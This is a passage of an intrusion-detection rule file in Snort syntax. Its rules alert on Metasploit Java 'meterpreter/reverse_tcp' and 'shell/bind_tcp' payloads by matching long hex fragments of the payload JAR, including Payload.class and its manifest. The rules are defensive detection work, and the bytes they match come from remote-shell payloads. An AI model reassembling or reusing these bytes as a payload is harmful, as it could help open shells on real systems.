00 34 01 00 00 e5 11 00 00 00 00 |"; sid:1000037; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/meterpreter/reverse_tcp"; flow:established; content:"| 50 4b 03 04 14 00 00 00 00 00 25 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 03 04 14 00 00 00 08 00 25 6d b9 3e f2 a1 d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 95 58 0b 7c 53 e5 15 3f 27 b9 c9 bd b9 bd 6d 43 4a 80 4b 45 51 2b 86 be a2 0c aa 06 64 96 52 a4 d0 97 a4 50 03 3a b8 24 b7 34 92 e6 96 e4 16 8a db 9c db 50 e7 74 d3 bd 54 7c cb d8 ea dc d8 a0 6c 69 b5 82 7b 68 51 37 9d 9b 1b f8 da 53 f6 70 ee ed 74 4f 65 e7 dc 9b b4 69 1b 1c eb ef d7 ef bb df eb 3c ff e7 7c e7 cb d3 ef 3c 72 18 9c 50 e3 98 29 c3 4a f8 99 08 3f 17 e1 17 32 dc 04 bf 94 69 fa 55 19 86 e1 b8 08 bf 92 41 84 e3 1e e8 86 5f 4b f0 1b 99 fa df 8a f0 9a 0c 0a 1c e7 63 bf 93 e1 02 78 9d 87 bf 97 e0 0f dc ff 51 82 3f f1 ca 9f f9 e0 5f 64 f8 2b bc 21 c1 df 78 f0 a6 04 6f 49 f0 77 19 e6 c0 3f b8 f9 a7 08 ff e2 fe df 12 fc 87 fb 57 b9 79 9b 9b 77 98 cf 09 19 01 51 42 07 cd a0 93 07 82 84 2e 09 dd 44 0b |"; content:"| 45 99 56 3c c4 1c 65 1e 16 49 a8 f0 b6 62 6e 4a 44 2c 95 e1 7c f4 4a 38 8d 17 7d 34 80 37 64 2c c3 e9 22 fa 25 9c 41 d4 71 a6 84 b3 78 4a 95 71 36 96 73 73 9a 0b ac 3f f1 39 19 e7 e0 e9 4c e9 8c ec 14 c4 c8 00 38 97 9b 33 25 3c 4b c2 b3 45 ac f0 e0 39 38 8f 34 c5 73 45 0c f0 60 be 8c 95 58 25 62 b5 84 35 12 d6 32 cd a0 88 e7 91 49 f1 7c 09 17 48 f8 1e 09 17 7a 70 11 d6 71 73 81 88 17 ca 10 c1 8b 44 0c c9 b0 01 17 73 b3 84 1a 12 95 a6 cb b9 b9 58 c4 a5 12 be 57 c2 4b 24 ac 97 41 c3 65 dc 34 70 b3 5c c4 46 b6 d2 71 09 57 b0 3e 97 4a b8 92 8c 8d 4d ac f9 2a 11 57 cb 60 60 b3 88 2d 32 6c 23 3f 62 ab 0c 69 76 d9 36 6c 13 b1 5d c4 cb 44 5c 23 61 58 86 7e 78 55 c4 0e 19 76 e0 5a 19 b6 e3 3a 3e d7 c9 cd e5 84 00 8c 70 b3 5e c2 0d ac e8 15 12 5e c9 36 78 9f 84 1b b9 df 24 a1 c6 fd 66 09 a3 22 c6 44 d4 65 b8 19 bb 58 e1 2d 3c df cd 4d 5c c2 ab 58 c0 ad 12 26 b8 ef 91 30 c9 bd c1 06 ee 15 71 9b 0c 77 b0 60 dd 98 a2 2f 4c 7b 68 da 64 0d fb 24 dc ce 0e de 21 61 bf 8c 3b f1 6a 5e 7e 3f 2f 7f 80 70 |"; content:"| 1f e4 b9 6b f8 eb 43 bc eb 5a 6e 3e cc cd 47 b8 f9 28 37 bb b8 b9 8e 9b eb 25 bc 41 c6 45 f0 a6 07 3f 86 37 f2 cc c7 59 b6 9b 24 bc 99 fb 4f 48 f8 49 09 6f 91 f0 56 11 3f 85 20 b6 85 37 b6 d6 b7 34 22 f8 9a af d2 b6 6b c1 84 96 dc 12 0c 9b a9 78 72 cb 62 04 a9 bd be 63 e5 c6 70 63 3b 82 bb 29 bc b1 be e9 72 c2 e6 7a 7b b0 bc 2d 8c e0 59 55 bf ae 7e e3 ca 36 a6 30 2b 9a d0 d2 e9 8a 1e dd d4 d2 bd 09 23 6e 56 b4 6b 3b 13 86 16 43 98 96 47 bc 81 77 11 6d 4f 78 67 d2 ec d6 cd 78 94 98 db 47 79 53 45 dc a8 58 11 4f e8 08 73 26 4e 2e d7 4c ad 29 d9 db 67 92 74 ba d6 83 30 7b e2 7a 5b 9f 99 b7 38 53 4b a5 b4 9d 15 16 df 0a e6 5b 61 2b 45 b2 2f 89 27 e3 e6 52 04 67 60 fe 3a 04 a1 c1 88 11 33 a1 47 8b 27 11 66 04 36 4c b5 03 6f 93 1b fb a3 7a af 19 37 92 69 52 67 47 2a 6e ea 8d 3d 9b f5 58 4c 8f d9 d2 2e 0c 4c d1 71 2a 25 7b 26 6e 04 f9 0c d1 15 f1 d3 22 7e 86 6c b1 d9 30 cc b4 99 d2 7a 11 c2 81 b1 5d 79 ea 8e 1f cd d7 b3 00 8b 93 c8 ef dd a2 9b ab 52 7a 63 bf 1e ed 33 b5 cd 2c f1 bc 40 81 |"; content:"| 85 50 a0 68 b1 58 63 bf a9 27 d3 a4 3e 09 db 15 4f c6 9a 92 cb e3 a9 49 5a 4f 50 b2 00 d5 9c de 44 22 69 a4 7a b4 44 fc 6a 12 e3 ac c0 29 1c 10 63 f1 74 5a 8f 9a 08 e7 16 da be a1 90 d8 6e 1b 1f 08 e7 fc 0f 45 73 88 94 96 44 13 16 36 14 fc 2c fc 04 61 ee a4 2d ad 86 b9 c2 e8 4b c6 c6 a0 80 70 fa f8 96 56 c3 da b4 5c ef b2 37 a5 52 46 4a c1 cf e1 6d 0a 1c c1 db a9 81 27 11 a6 5b fb fb cc 78 22 d8 9e 32 7a f5 94 19 d7 d3 0a 7c 13 be 45 41 30 1e 39 b5 d9 c8 51 e0 15 16 64 c6 64 f1 97 f5 75 75 e9 44 fd 0e a2 8e bb f1 4e 05 ef c2 bb 49 e3 5a 4b 65 05 ef c1 db 10 4a 83 79 04 63 9a a9 e0 bd 78 9f 82 f7 e3 03 22 ee 51 f0 f3 2c 8f 3c 0e 08 05 f7 c2 8f 88 c6 35 e9 5e 6d 07 a9 26 d4 9a 3d bd 0a 7e 01 8e 29 f8 45 1c 20 18 e4 fb 44 c1 07 99 87 50 1b 8b 93 1c 5f c2 01 d6 f2 21 05 9e 81 67 45 fc b2 82 5f c1 7d 14 27 cb 49 c7 5e 3d 96 cf e4 ab 2c f2 d7 70 3f 82 2b 6c 33 c2 f3 88 35 1e 10 71 50 c1 83 f8 75 05 bf 81 19 05 87 70 18 a1 64 b2 06 0f e3 23 0a 8e b0 34 b3 f2 a5 c9 8f 09 16 e4 51 04 ca |"; content:"| f0 b0 88 8f 29 f8 4d 24 eb 7a 27 db 90 84 e7 29 05 9e 67 b5 e5 1a cb 74 bd 9a d9 ad e0 b7 f1 3b 22 3e ae e0 13 38 aa e0 11 1c 15 f1 49 05 9f c2 a7 15 fc 2e 3c a9 c0 61 38 a4 c0 77 d8 65 96 49 6a e3 46 ad 9d 03 8a d3 ba 99 1f 61 a5 93 00 24 e2 f7 14 7c 06 be a5 e0 b3 f8 fd 09 22 b5 6d be 8a d0 ad e0 73 f8 03 11 7f a8 e0 f3 48 32 9d 91 0f ae 70 5f b4 bb 45 37 bb 8d 7c f8 b9 a2 dd 3d 06 e5 57 47 55 bf 82 3f c6 a3 08 65 e3 67 c6 f6 29 78 8c 7d ed 6a 6e 6f 5b d3 41 6a 2f a4 3f 1e ae 6c 0b 77 88 f8 82 82 2f e2 4b 0a be 8c af e4 24 4e ea 66 30 6c 44 b7 ea 26 1b 93 00 e8 1f 9f d6 53 db f5 d4 f8 e2 4f 15 fc 19 fe 5c c1 5f e0 2f 11 d4 71 74 db 36 ee 30 b6 ea 49 8a 72 ca 14 45 59 48 cf ad a9 99 4b 7c c2 a6 b6 45 6f d7 52 1a 79 58 4f 51 4e c5 b9 4c ee 55 05 8f e3 51 05 7f c5 e0 ca 0b 88 e0 d8 55 52 9c 4b bb 16 05 05 7e 00 3f a4 c3 41 05 7f 8d bf 51 f0 b7 f8 1a e5 fe 1c 34 26 5d 19 cc e0 81 9c 94 94 4d fa 28 8b ef 0c b6 eb a9 1e 4a 2e 76 66 2f 9f b8 56 9f 48 8c 2f 2b f8 3b 7c 3d 17 f2 e3 c7 |"; content:"| ae a3 f5 e5 86 7d 87 cc 9a b8 81 ef 97 b0 d1 97 8a ea b9 10 62 3b ae 5d d3 4c 09 a7 8b 60 13 0a 06 83 53 a8 46 29 33 04 1b 38 3d 74 c5 a3 9a a9 b3 e8 bf e7 e6 0f 0a fe 91 0d f4 27 fc b3 82 7f c1 bf 2a f8 06 fe 8d 4c c5 c7 7b 6d 1b d5 a6 d9 32 b5 0a be 89 6f 91 9b 69 94 22 57 3d ce 78 9d 99 c3 eb 14 cb 3c c1 cb d3 73 cb 13 e3 69 94 d7 ca ec 1c 5b cb d0 aa 1d cb b1 79 70 eb e8 4e 19 3b 6c dc 97 e5 1c d0 4e db f2 8c ff 77 42 22 fe 43 81 47 39 80 1e 83 47 e8 0e 0e a6 bb 15 38 0a c7 08 96 c1 cd f1 a4 02 3f e6 68 14 6a f5 7e d2 f9 05 78 51 c1 7f 72 b4 97 e6 23 4b 8b 6e 55 e0 25 78 59 c1 7f e1 3e 05 ff 0d 94 13 fe c3 bb 90 94 7e 1b df a1 78 a8 ad 15 f1 84 e2 00 32 95 03 f1 2d c5 e1 70 38 29 49 3a 04 c5 e1 72 b8 f9 4b 54 1c 92 c3 a3 38 64 47 91 e2 50 1c c5 8a a3 84 37 97 3a bc bc 30 8d 16 30 43 f7 8e 91 ae 4d 12 46 45 87 4f 71 94 39 a6 2b 0e bf 63 86 02 0f b3 ec 25 9c 2c 6a d3 7a 2f a1 d8 a4 5c 0f 23 96 46 5a bc 9f 24 e1 4b ce b2 57 b7 d1 a3 e7 02 68 3c 13 34 93 9f 38 2a e6 e4 67 b1 |"; content:"| 98 25 9b da f2 66 c5 2e 23 d5 aa 31 5d 99 ae f5 16 3d 9d 26 87 93 fb 02 05 af 6f 7f a0 70 49 20 d2 59 9b 8a 98 d2 7b 13 1a 03 74 46 a0 a1 a1 20 11 b7 46 89 3c 49 f1 57 7d 4a 55 83 7d 41 f1 9d 6a 1a b9 74 5b 46 fc d6 e8 69 2b 14 ea d3 b9 42 6d fe bb 5e ff f9 15 10 c1 c2 4e 01 b3 0a 57 48 ac 53 59 81 05 4e 93 09 23 4d da 15 91 04 d9 6b 77 27 f9 2f 4a ab a6 de a1 f7 f4 da e9 db 1d d3 13 94 8d ac ca 90 8a dc 52 da 5d bf 39 6d 24 fa 4c ca 54 66 37 d1 e9 d9 1a e3 aa e7 ec c0 c4 fa a4 b0 7d cb c6 31 bb 52 4b 77 67 ef 04 77 4a ef 31 b6 4f 2e bf ec fc 3f c1 90 d9 29 bb 74 6b d0 92 46 92 32 41 c2 16 c4 49 ca 21 5c 58 80 c2 29 d2 bc f0 ff a9 db 26 22 61 da f8 5c 53 d2 d4 b7 30 8c 25 8a 81 b4 4e c3 93 a0 ad 89 30 b6 5d 4b f4 e9 6d 5d bc a3 a9 20 e1 a2 74 be 77 fe 7f 09 c7 94 2b 66 37 6b 29 3d 69 da 7e f5 06 a6 d4 93 6e cb 93 5c ca 07 26 d7 e4 56 ca 34 52 74 ae 2a 70 aa 45 37 9f ca b3 cb 9a be a4 19 cf 85 e7 d8 c0 3f 21 3c b3 d3 8c 6a ca 75 f4 06 0a 14 7c 7a e4 4d 91 6d a2 ba 55 a8 4e |"; content:"| 26 56 13 40 3f 33 70 b2 30 e2 ad 56 79 9a db ea 9d 90 c5 75 8e 31 57 3a a1 eb f4 1a 11 02 ab 58 39 c5 0e 8d b6 64 63 7f dc 9c 20 c0 32 c3 48 e8 1a d7 8b 1d 91 76 7a 05 7a ac 8c c4 75 0a c2 25 81 77 7f 9f d8 85 77 be 8e 29 bd 2b 41 4e 0c da 14 d8 38 1d 6b d6 12 d5 b2 e6 29 1c 17 e7 6e da 02 07 c9 c1 f1 e4 76 2a 3e 10 2e 2a 10 24 1b 4e 31 4a c4 1d 5a 9c 52 72 ca ca 08 84 e1 d2 5e fb 3e a3 0b a8 23 65 e5 cb fc aa 72 67 da d4 c9 98 0e ae 01 fc 27 31 bd d3 e0 c0 1d 5f cd bb 20 17 73 f6 9d 6a af 26 eb 91 1a b0 3a b7 16 e5 3b 80 cc 91 f3 ed 78 a5 b6 d8 4e 58 13 5f c1 b3 f2 30 30 01 c2 85 df 51 85 81 5d 14 a5 4b c9 b4 4a b9 34 3f dd f4 7e 7b 40 62 65 b1 12 d8 b0 8c cd e3 b2 9e c5 64 36 1a 37 59 02 3b e9 e5 48 97 5c 96 55 81 92 cb 62 b0 20 d0 9c 5f 17 e5 dc 73 d2 62 c8 3a 54 3f 99 e8 78 9d b5 f8 a4 ec 1a 8c 44 c2 2e d6 ec 1b 90 e5 b7 b2 96 87 bf 56 f4 25 12 3b b3 ea b0 de 31 9d 5e ba ba 05 52 84 a6 42 58 26 35 9b df bd 1c 2c f8 d0 54 52 74 0d 26 b6 e7 48 4f 9f fa d3 81 c5 3f a9 ef |"; content:"| 68 4a 52 f9 |"; content:"| 8c 4e b9 dc c7 20 aa 9e 24 47 31 81 bc 7b 32 1f 67 16 92 f4 fe 78 da 24 de 42 6f 5f 9a 2e 14 cf 58 19 43 e9 b3 5b 4b b7 50 02 cc 79 dc ad 6f eb d3 12 e9 49 a9 3d 17 37 eb 73 41 60 5d 74 eb 68 8e 69 08 69 eb 6d ef ec 35 7a ad 67 51 96 78 43 b7 46 8b d8 40 85 76 a0 e1 5d aa 06 0f 65 9b 1e ca df f5 e6 94 eb 62 4c f3 ea ff 71 7f 4e 22 29 c6 93 31 bd 9f ef 1f 0e a6 26 56 b9 6f 73 3a 5b 9a cc 08 34 9d e4 4e 32 0d 96 b9 9e 7f 4c e2 93 f3 37 90 ec ee 84 9e dc c2 d7 b0 3b ca 6b a6 4d b2 81 91 d3 64 91 ce 33 48 b3 41 97 36 c7 44 63 eb a5 cd 4d e1 95 63 3f b4 e5 ad da 7c 9a 8d 1d 7a aa 41 4b e7 95 06 f9 7b 0a 88 07 67 42 37 0c 03 80 0c b3 b9 24 a5 af d9 5c 84 5a 3d d5 d8 56 7f 38 db 3f 66 cd 4b fc 53 03 20 7c db fa ad 57 e2 57 6c de e8 f1 09 a3 27 26 8c 46 f3 46 45 f4 75 04 9e a4 f6 29 1a 4d a3 9e de db e0 aa 1c 02 f7 01 6b 83 07 9e 86 ef 82 83 97 9d 06 b8 69 0b 38 c3 23 20 46 86 40 6a 1e 04 cf 11 28 f5 c9 c3 50 14 39 08 9e 01 70 d3 4c cb 08 28 b4 5a 5c 9d 81 12 6f ad 37 98 81 d2 |"; content:"| 0c 78 7d d3 a8 |"; content:"| c9 80 af b5 da 57 96 81 e9 21 41 15 46 a1 a4 4a 15 32 e0 e7 66 46 95 6f 66 06 66 85 5c aa 6b 14 36 f9 54 df ec 61 28 0f b9 55 77 06 4e eb 1c 81 39 91 2c 55 9e 38 9d e9 9d 61 d3 1b 82 b9 21 51 15 33 70 a6 b5 4b 15 55 d7 10 9c 15 92 aa 55 97 2a 0d c3 d9 16 d9 8a ce 2a df 39 aa 94 81 79 19 38 97 be 03 be f9 19 a8 1c 86 aa 3a 37 2d 30 5b d1 ef be 17 4f a3 15 bf 5b 88 0d 03 c9 5e d3 99 13 42 e2 93 13 85 90 a6 0a e1 b1 d8 7b 7c b5 cc 5e b6 07 35 fc 5d a4 16 65 80 ac 70 5e 67 75 8d 5a 44 22 8d c0 f9 11 55 1e 82 05 21 a5 4a 55 7c ef c9 c0 42 55 c9 c0 a2 61 a8 13 0f c1 05 11 a7 ef c2 61 b8 28 1c 11 7c a1 70 c4 a5 7a 88 57 38 e2 66 73 86 33 b0 38 54 ac 16 67 60 09 59 8c fb 8b a9 9f 0e 4b 87 e1 12 3a 3a 27 e2 54 8b e8 9c c5 90 8f ca 74 4e f5 84 43 25 ce ba 52 7f a9 5a 72 78 0f 2c 72 d6 79 fd 5e af bc 07 ce 51 4b fc a5 0b 48 b3 dd e0 1e 80 99 d9 51 fd 74 58 46 d4 76 79 71 e0 c4 4b bb 4a a9 7d 6a 00 63 aa 38 0a 77 db f6 65 5d a5 41 58 7e 27 44 07 a1 91 dd bf c2 76 7f a3 e5 fe 46 |"; content:"| a5 c2 21 58 19 |"; content:"| 71 0e 42 13 89 bb 4a 95 68 b8 9a 87 cd 34 6c e9 1c 20 8b 78 48 53 b7 ad 69 1b ab d9 ce b2 8a ac 5c 06 2e a3 1d 72 c8 c3 5a 87 69 9b 60 6d b3 17 3b 2d ae 3e db 1b dc 06 f9 63 00 46 ab 7c 1d be b5 59 87 4a 55 be 75 48 df 21 8f 5f ba 07 bc 83 d0 19 92 07 e1 f2 50 d1 00 5c ac 7a 46 a1 6c 04 22 e4 19 bf 34 04 eb 43 ca 00 cc 1e 81 0d 11 1e 5d 61 1b f6 ca 90 c2 dd fb d8 23 1b 43 32 77 9b 42 45 23 a0 e5 7c ef db 4c 3e af f2 45 d9 6f 95 b6 fb 7d b1 21 d0 e9 1c ed ed 22 79 43 c5 ce ba 12 7f 89 5a 4c e6 2e 53 8b e9 8b 16 b6 84 77 95 90 31 5f 1f 81 6e a2 12 57 65 b5 a8 ca 77 15 4b aa 16 0f c1 d6 03 e0 70 88 8e c5 8e a5 d0 4a fd 95 8e 4d b0 86 82 ef 7b f4 2f 50 44 ae a1 bc f0 0c 3c 6b 87 21 ac a5 39 91 fa a6 ca 9c 48 09 16 c9 96 85 62 ab 95 01 56 cd f8 12 a6 79 e1 51 29 e4 aa 51 5d 19 e8 89 d4 b9 1d f7 81 57 15 54 97 d3 4f 61 94 1c 38 f1 1a 87 de 22 3b d2 99 99 9b 58 7c 1f 9e 03 1f ff 18 63 b3 c3 f9 c4 ac 88 7a ff 08 18 91 aa 21 e8 0d b9 46 60 1b f1 4d 71 e0 8d 40 9a 3e cd 0c f4 |"; content:"| 8d c0 76 b2 d1 0e |"; content:"| ef 8f f8 76 0e c1 d5 ce 43 f0 fe 21 f8 00 43 e6 83 21 a9 e6 08 5c c4 62 5c 53 e7 f1 7b 48 28 99 02 54 ce c0 87 2a 2b 51 95 9d 7e 0f 3b f4 da 48 88 e4 fa f0 d8 b6 7b 4e 1c 1b 80 f2 9c 96 1f 21 0d 6b 6c 2d 87 01 ed dc f0 51 82 8a db b7 cb 9d 85 dc 75 8c c7 eb 6d 3c 5e 67 e1 f1 3a 02 d8 20 dc c0 f3 1f b3 e7 6f b0 e6 6f 20 cc 0d c2 8d 3c ff 71 7b fe 46 6b fe 46 0b b4 1e b7 05 5a d5 45 a7 ab 19 9d 42 16 bc 3e 4e 50 23 70 33 db f7 13 19 f8 e4 01 ce 97 e8 40 17 dc 34 c9 5f cf c3 8f b2 59 75 3d 19 d2 41 7d 2b 52 c2 bc 65 37 cc c9 2a 34 08 b7 72 0e f9 94 ad 12 a1 f7 d3 cd 55 47 26 af 7e 26 7f 75 14 24 72 f3 e9 fb 69 f4 d9 fd 96 d3 64 fe 95 25 cb a7 8a b8 70 f6 3e 23 4b 81 d1 49 21 b3 1b 24 df e7 06 c0 c5 80 65 52 b9 83 47 e1 58 f6 e0 02 12 5a a0 7e 1e d1 bd ad 05 5b 29 d5 dc be 1b 54 8e f7 ea 2a 62 45 59 ac 95 0c 7f fb 9d e0 c2 d6 9a dc f9 17 e0 c5 ec f9 87 e9 b4 9b fa 7d 23 70 07 31 de dd 4c 74 ee 6c a9 aa 76 52 3e b9 ab 93 63 a7 5a 58 30 08 77 53 94 30 9d 7b 76 43 03 75 |"; content:"| 5b 42 82 ef 5e c6 df |"; content:"| 7d 9c 80 4e bc e6 bb 3f 3b 38 8d 74 7c c0 b5 07 14 16 80 6e a2 b9 fb 69 62 0f e7 05 eb ba b8 ab 73 e0 c4 a3 59 15 43 82 b3 ce e5 77 f1 81 3d 50 e1 77 09 7b 41 51 c9 df 9f cf c0 de 4e 55 a8 f2 13 92 be 90 81 2f 76 ee 72 51 f0 bd 68 65 30 c1 4e d8 39 35 5e 82 97 6d 35 d0 43 6a 48 34 f7 36 9d 5f 52 e9 0d 96 d3 cd e5 bd 82 db d5 d8 52 e9 0d 65 60 60 e9 9c 7b e1 7a cb a6 d7 ce 11 36 d5 09 95 4e 3f 91 7b b0 85 4c fd 25 0e 8b dc c5 e7 a5 53 7b 89 4f 8b ea f2 0b 0b cb ef 07 d9 2f 08 9b c8 09 7e a1 4e c8 c9 ee a6 81 e8 a7 0b 8b f2 44 80 36 8a bc b1 84 3f 84 d8 c2 f2 fb e8 d3 6d cd b2 2e bb 44 92 ff 28 23 de b7 7a 00 2e 23 7e 0f 91 ae ef ad 24 ee 5f a6 53 75 95 e5 a4 e9 57 48 a0 72 66 64 7d fa 05 d7 5e 28 65 09 79 e2 c1 01 10 2a 5b 2a 49 b6 87 32 b0 8f 68 10 c0 ee 6e e1 f3 fb 56 bb ac 24 4b 38 17 2a c3 fb b3 45 c2 2b f0 93 6c ba 99 07 4e 0b be 8c 41 dc df 3c 02 ce 08 d9 5b 18 02 d7 63 16 dc 04 70 59 eb b9 f2 e2 a7 63 e5 44 bd 35 0f b0 c8 f7 d5 61 f8 da 20 ec cf c0 81 83 |"; content:"| e8 3b 48 a3 83 f0 75 |"; content:"| df 37 06 61 90 3c 7e 10 6e 19 a4 51 c6 fa 5c ee 1b b2 56 6f b5 93 12 fc 17 50 4b 03 04 14 00 00 00 00 00 25 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 03 04 14 00 00 00 08 00 25 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 f3 4d cc cb 4c 4b 2d 2e d1 0d 4b 2d 2a ce cc cf b3 52 30 d4 33 e0 e5 f2 4d cc cc d3 75 ce 49 2c 2e b6 52 c8 4d 2d 49 2c 2e c8 c9 cf 2c d1 0b 48 ac cc c9 4f 4c e1 e5 e2 e5 f2 4b cc 4d 45 96 d3 87 ca e9 25 83 74 81 54 00 00 50 4b 03 04 14 00 00 00 08 00 25 6d b9 3e |"; content:"| 1b 00 00 00 1e 00 00 00 0e 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 0b 2e 48 2c cf b3 35 e2 f2 f1 f0 0f 0e b1 |"; content:"| 03 43 2e 9f 00 ff 20 20 8f 0b 00 50 4b 01 02 14 00 14 00 00 00 00 00 25 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 01 02 14 00 14 00 00 00 08 00 25 |"; content:"| 6d b9 3e f2 |"; content:"| d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 29 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 50 4b 01 02 14 00 14 00 00 00 00 00 25 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 06 11 00 00 4d 45 54 41 2d 49 4e 46 2f 50 4b 01 02 14 00 14 00 00 00 08 00 25 6d b9 3e 06 f5 c4 12 4a 00 00 00 5b 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 2d 11 00 00 4d 45 54 41 2d 49 4e 46 2f 4d 41 4e 49 46 45 53 54 2e 4d 46 50 4b 01 02 14 00 14 00 00 00 08 00 25 6d b9 3e |"; content:"| 1b 00 00 00 1e 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 a9 11 00 00 6d 65 74 61 73 70 6c 6f 69 74 2e 64 61 74 50 4b 05 06 00 00 00 00 05 00 05 00 34 01 00 00 f0 11 00 00 00 00 |"; sid:1000038; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"java/shell/bind_tcp"; flow:established; content:"| 50 4b 03 04 14 00 00 00 00 00 57 6d b9 3e 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 4b 03 04 14 00 00 00 08 00 57 6d b9 3e f2 a1 d4 1c a7 10 00 00 f1 1f 00 00 18 00 00 00 6d 65 74 61 73 70 6c 6f 69 74 2f 50 61 79 6c 6f 61 64 2e 63 6c 61 73 73 95 58 0b 7c 53 e5 15 3f 27 b9 c9 bd b9 bd 6d 43 4a 80 4b 45 51 2b 86 be a2 0c aa 06 64 96 52 a4 d0 97 a4 50 03 3a b8 24 b7 34 92 e6 96 e4 16 8a db 9c db 50 e7 74 d3 bd 54 7c cb d8 ea dc d8 a0 6c 69 b5 82 7b 68 51 37 9d 9b 1b f8 da 53 f6 70 ee ed 74 4f 65 e7 dc 9b b4 69 1b 1c eb ef d7 ef bb df eb 3c ff e7 7c e7 cb d3 ef 3c 72 18 9c 50 e3 98 29 c3 4a f8 99 08 3f 17 e1 17 32 dc 04 bf 94 69 fa 55 19 86 e1 b8 08 bf 92 41 84 e3 1e e8 86 5f 4b f0 1b 99 fa df 8a f0 9a 0c 0a 1c e7 63 bf 93 e1 02 78 9d 87 bf 97 e0 0f dc ff 51 82 3f f1 ca 9f f9 e0 5f 64 f8 2b bc 21 c1 df 78 f0 a6 04 6f 49 f0 77 19 e6 c0 3f b8 f9 a7 08 ff e2 fe df 12 fc 87 fb 57 b9 79 9b 9b 77 98 cf 09 19 01 51 42 07 cd a0 93 07 82 84 2e 09 dd 44 0b |"; content:"| 45 99 56 3c c4 1c 65 1e 16 49 a8 f0 b6 62 6e 4a 44 2c 95 e1 7c f4 4a 38 8d 17 7d 34 80 37 64 2c c3 e9 22 fa 25 9c 41 d4 71 a6 84 b3 78 4a 95 71 36 96 73 73 9a 0b ac 3f f1 39 19 e7 e0 e9 4c e9 8c ec 14 c4 c8 00 38 97 9b 33 25 3c 4b c2 b3 45 ac f0 e0 39 38 8f 34 c5 73 45 0c f0 60 be 8c 95 58 25 62 b5 84 35 12 d6 32 cd a0 88 e7 91 49 f1 7c 09 17 48 f8 1e 09 17 7a 70 11 d6 71 73 81 88 17 ca 10 c1 8b 44 0c c9 b0 01 17 73 b3 84 1a 12 95 a6 cb b9 b9 58 c4 a5 12 be 57 c2 4b 24 ac 97 41 c3 65 dc 34 70 b3 5c c4 46 b6 d2 71 09 57 b0 3e 97 4a b8 92 8c 8d 4d ac f9 2a 11 57 cb 60 60 b3 88 2d 32 6c 23 3f 62 ab 0c 69 76 d9 36 6c 13 b1 5d c4 cb 44 5c 23 61 58 86 7e 78 55 c4 0e 19 76 e0 5a 19 b6 e3 3a 3e d7 c9 cd e5 84 00 8c 70 b3 5e c2 0d ac e8 15 12 5e c9 36 78 9f 84 1b b9 df 24 a1 c6 fd 66 09 a3 22 c6 44 d4 65 b8 19 bb 58 e1 2d 3c df cd 4d 5c c2 ab 58 c0 ad 12 26 b8 ef 91 30 c9 bd c1 06 ee 15 71 9b 0c 77 b0 60 dd 98 a2 2f 4c 7b 68 da 64 0d fb 24 dc ce 0e de 21 61 bf 8c 3b f1 6a 5e 7e 3f 2f 7f 80 70 |"; content:"| 1f e4 b9 6b f8 eb 43 bc eb 5a 6e 3e cc cd 47 b8 f9 28 37 bb b8 b9 8e 9b eb 25 bc 41 c6 45 f0 a6 07 3f 86 37 f2 cc c7 59 b6 9b 24 bc 99 fb 4f 48 f8 49 09 6f 91 f0 56 11 3f 85 20 b6 85 37 b6 d6 b7 34 22 f8 9a af d2 b6 6b c1 84 96 dc 12 0c 9b a9 78 72 cb 62 04 a9 bd be 63 e5 c6 70 63 3b 82 bb 29 bc b1 be e9 72 c2 e6 7a 7b b0 bc 2d 8c e0 59 55 bf ae 7e e3 ca 36 a6 30 2b 9a d0 d2 e9 8a 1e dd d4 d2 bd 09 23 6e 56 b4 6b 3b 13 86 16 43 98 96 47 bc 81 77 11 6d 4f 78 67 d2 ec d6 cd 78 94 98 db 47 79 53 45 dc a8 58 11 4f e8 08 73 26 4e 2e d7 4c ad 29 d9 db 67 92 74 ba d6 83 30 7b e2 7a 5b 9f 99 b7 38 53 4b a5 b4 9d 15 16 df 0a e6 5b 61 2b 45 b2 2f 89 27 e3 e6 52 04 67 60 fe 3a 04 a1 c1 88 11 33 a1 47 8b 27 11 66 04 36 4c b5 03 6f 93 1b fb a3 7a af 19 37 92 69 52 67 47 2a 6e ea 8d 3d 9b f5 58 4c 8f d9 d2 2e 0c 4c d1 71 2a 25 7b 26 6e 04 f9 0c d1 15 f1 d3 22 7e 86 6c b1 d9 30 cc b4 99 d2 7a 11 c2 81 b1 5d 79 ea 8e 1f cd d7 b3 00 8b 93 c8 ef dd a2 9b ab 52 7a 63 bf 1e ed 33 b5 cd 2c f1 bc 40 81 |"; content:"| 85 50 a0 68 b1 58 63 bf a9 27 d3 a4 3e 09 db 15 4f c6 9a 92 cb e3 a9 49 5a 4f 50 b2 00 d5 9c de 44 22 69 a4 7a b4 44 fc 6a 12 e3 ac c0 29 1c 10 63 f1 74 5a 8f 9a 08 e7 16 da be a1 90 d8 6e 1b 1f 08 e7 fc 0f 45 73 88 94 96 44 13 16 36 14 fc 2c fc 04 61 ee a4 2d ad 86 b9 c2 e8 4b c6 c6 a0 80 70 fa f8 96 56 c3 da b4 5c ef b2 37 a5 52 46 4a c1 cf e1 6d 0a 1c c1 db a9 81 27 11 a6 5b fb fb cc 78 22 d8 9e 32 7a f5 94 19 d7 d3 0a 7c 13 be 45 41 30 1e 39 b5 d9 c8 51 